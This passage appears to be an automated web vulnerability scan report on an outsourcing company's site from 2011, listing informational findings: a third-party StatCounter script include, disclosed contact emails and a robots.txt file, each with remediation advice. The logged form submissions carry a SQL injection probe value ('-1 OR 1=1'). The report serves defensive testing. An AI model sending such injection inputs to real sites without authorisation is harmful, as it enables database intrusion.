href="http://www.mobiledevelopmentindia.com/mobile-application-development-edinburgh.html" target="_blank" title="mobile application development edinburgh,iphone,blackberry">mobile application development edinburgh</a><a href="http://www.phpwebapplicationdevelopment.com/wasp-development.html" target="_blank" 
title="wasp development,wasp developers,wasp php developers">wasp development</a>
...[SNIP]...
</a><a href="http://www.phpsoftwaredevelopment.com/php-website-development.html" target="_blank" title="php website development,,">php website development</a><a href="http://www.phpsoftwaredevelopment.com/php-xml-web-services-development.html" target="_blank" title="php xml web services development,,">php xml web services development</a><a href="http://www.flashapplicationdevelopment.com/insurance-industry.html" target="_blank" title="flash insurance industry solutions,flash based insurance website,flash insurance dynamic website">flash insurance industry solutions</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/windows-mobile-game-development.html" target="_blank" title="windows mobile game development,windows mobile games programming,windows games programming offshore services">windows mobile game development</a><a href="http://www.flashdevelopersindia.com/red-5-development-india.html" target="_blank" title="red 5 development india,red 5 programming services india,red 5 server application development india">red 5 development india</a>
...[SNIP]...
</a><a href="http://www.pythonwebdevelopment.com/pyxml-development.html" target="_blank" title="pyxml development,pyxml developers,pyxml python developers">pyxml development</a><a href="http://www.customwebdevelopmentcompany.com/custom-website-development.html" target="_blank" title="custom website development,custom development,website development">custom website development</a><a href="http://www.phpsoftwaredevelopment.com/mambo-cms-customization.html" target="_blank" title="mambo cms customization,,">mambo cms customization</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-chester.html" target="_blank" title="mobile application development chester,iphone,blackberry">mobile application development chester</a><a href="http://www.aspnetprogrammers.com/net-programming.html" target="_blank" title=".net programming,.net web programming,.net software programming">.net programming</a>
...[SNIP]...
</a><a href="http://www.androidmobiledevelopment.com/android-tools-application.html" target="_blank" title="android tools application,android application development,google android applications">android tools application</a><a href="http://www.phpwebapplicationdevelopment.com/contact-php-developers.html" target="_blank" title="contact php developers,contact php web development company,php programmers">contact php developers</a><a href="http://www.mobiledevelopmentindia.com/solutions.html" target="_blank" title="offshore mobile application solutions,mobile applications,mobile application development">offshore mobile application solutions</a><a href="http://www.phpsoftwaredevelopment.com/postgresql-database-application-development.html" target="_blank" title="postgresql database application development,,">postgresql database application development</a><a href="http://www.pythonwebdevelopment.com/silva-development.html" target="_blank" title="silva development,silva developers,silva python developers">silva development</a><a href="http://www.phpsoftwaredevelopment.com/mysql-database-maintenance.html" target="_blank" title="mysql database maintenance,,">mysql database maintenance</a><a href="http://www.phpwebapplicationdevelopment.com/flow3-development.html" target="_blank" title="flow3 development,flow3 developers,flow3 php developers">flow3 development</a><a href="http://www.mobiledevelopmentindia.com/mobile-game-development.html" target="_blank" title="mobile game development,mobile game development india,windows mobile game development">mobile game development</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-newark.html" target="_blank" title="flash application development newark,flash website development newark,hire flash developers newark">flash application development newark</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-detroit.html" target="_blank" title="flash application development 
detroit,flash website development detroit,hire flash developers detroit">flash application development detroit</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-bradford.html" target="_blank" title="flash application development bradford,flash website development bradford,hire flash developers bradford">flash application development bradford</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-ireland.html" target="_blank" title="mobile application development ireland,iphone,blackberry">mobile application development ireland</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-bradford.html" target="_blank" title="mobile application development bradford,iphone,blackberry">mobile application development bradford</a>
...[SNIP]...
</a><a href="http://www.aspnetprogrammers.com/net-development-services.html" target="_blank" title=".net development services,.net web programming services,.net services">.net development services</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-fullerton.html" target="_blank" title="flash application development fullerton,flash website development fullerton,hire flash developers fullerton">flash application development fullerton</a>
...[SNIP]...
</a><a href="http://www.outsourcewebapplicationdevelopment.com/custom-software-development-outsourcing.html" target="_blank" title="custom software development outsourcing,,">custom software development outsourcing</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-pune.html" target="_blank" title="flash application development pune,flash website development pune,hire flash developers pune">flash application development pune</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-ireland.html" target="_blank" title="flash application development ireland,flash website development ireland,hire flash developers ireland">flash application development ireland</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/symbian-mobile-game-development.html" target="_blank" title="symbian mobile game development,symbian mobile games programming,offshore symbian mobile games programming">symbian mobile game development</a>
...[SNIP]...
</a><a href="http://www.phpsoftwaredevelopment.com/php-application-maintenance.html" target="_blank" title="php application maintenance,,">php application maintenance</a><a href="http://www.androidmobiledevelopment.com/android-job-search-application.html" target="_blank" title="android game application,android application development,google android applications">android game application</a>
...[SNIP]...
</a><a href="http://www.flashapplicationdevelopment.com/flash-template-design.html" target="_blank" title="flash template design,flash design templates,flash template web design">flash template design</a><a href="http://www.androidmobiledevelopment.com/android-sports-application.html" target="_blank" title="android sports application,android application development,google android applications">android sports application</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-columbus.html" target="_blank" title="flash application development columbus,flash website development columbus,hire flash developers columbus">flash application development columbus</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-fullerton.html" target="_blank" title="mobile application development fullerton,iphone,blackberry">mobile application development fullerton</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-chicago.html" target="_blank" title="mobile application development chicago,iphone,blackberry">mobile application development chicago</a>
...[SNIP]...
</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-worcester.html" target="_blank" title="mobile application development worcester,iphone,blackberry">mobile application development worcester</a><a href="http://www.phpsoftwaredevelopment.com/moodle-customization-and-implementation.html" target="_blank" title="moodle customization and implementation,,">moodle customization and implementation</a><a href="http://www.phpsoftwaredevelopment.com/joomla-crm-customization.html" target="_blank" title="joomla crm-customization,,">joomla crm-customization</a><a href="http://www.rubysoftwaredevelopment.com/camping-development.html" target="_blank" title="camping development,camping developers,camping ruby developers">camping development</a>
...[SNIP]...
</a><a href="http://www.webapplicationdevelopmentcompanies.com/web-application-development-uk.html" target="_blank" title="web application development uk,,">web application development uk</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-brighton.html" target="_blank" title="flash application development brighton,flash website development brighton,hire flash developers brighton">flash application development brighton</a><a href="http://www.pythonwebdevelopment.com/genshi-development.html" target="_blank" title="genshi development,genshi developers,genshi python developers">genshi development</a><a href="http://www.pythonwebdevelopment.com/web2py-development.html" target="_blank" title="web2py development,web2py developers,web2py python developers">web2py development</a>
...[SNIP]...
</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-bombay.html" target="_blank" title="flash application development bombay,flash website development bombay,hire flash developers bombay">flash application development bombay</a>
...[SNIP]...
</a><a href="http://www.flashapplicationdevelopment.com/sitemap.html" target="_blank" title="flash application development,flash website development,flash internet application development">flash application development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-stoke-on-trent.html" target="_blank" title="mobile application development stoke-on-trent,iphone,blackberry">mobile application development stoke-on-trent</a><a href="http://www.androidmobiledevelopment.com/android-tools-application.html" target="_blank" title="android tools application,android application development,google android applications">android tools application</a><a href="http://www.perlwebdevelopment.com/default.html" target="_blank" title="perl development,perl web developers,perl software development">perl development</a>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js">
</script>
...[SNIP]...

6. Cross-domain script include
There are 4 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://www.outsourcingdotnetdevelopment.com/Netsparker3e7ec43c653f4369b8e15ab648a7454f.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Netsparker3e7ec43c653f4369b8e15ab648a7454f.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:51 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js">
</script>
...[SNIP]...

6.2. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker86454240ba544e4fbfaa35b725c93778.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Netsparker86454240ba544e4fbfaa35b725c93778.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js">
</script>
...[SNIP]...

6.3. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparkercfe7b9a5d67d488389828738d85656f2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Netsparkercfe7b9a5d67d488389828738d85656f2.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js">
</script>
...[SNIP]...

6.4. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /outsourcing-dot-net-development-contact-us.html HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 112

p_name=-1+OR+1%3d1&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3&G=Submit

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:20:40 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 11371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js">
</script>
...[SNIP]...

7. Email addresses disclosed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The following email addresses were disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

POST /outsourcing-dot-net-development-contact-us.html HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 112

p_name=-1+OR+1%3d1&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3&G=Submit

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:20:40 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 11371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<strong>We can be reached via email at - sales@outsourcingdotnetdevelopment.com</strong>
...[SNIP]...
</strong> info@outsourcingdotnetdevelopment.com<br>
...[SNIP]...
</strong> support@outsourcingdotnetdevelopment.com<br>
...[SNIP]...
<input name="p_email" type="text" size="35" required="1" realname="Email Address" maxlength="200" value="netsparker@example.com" regexp="JSVAL_RX_EMAIL" style="border-style:solid;border-width:1px" />
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html" title=": info@outsourcingdotnetdevelopment.com">: info@outsourcingdotnetdevelopment.com</a>
...[SNIP]...

8. Robots.txt file

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.outsourcingdotnetdevelopment.com

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:20:41 GMT
Server: Apache
Last-Modified: Thu, 27 May 2010 09:48:00 GMT
ETag: "2d54077-36-4bfe3fd0"
Accept-Ranges: bytes
Content-Length: 54
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /link_resources.html
Allow: /
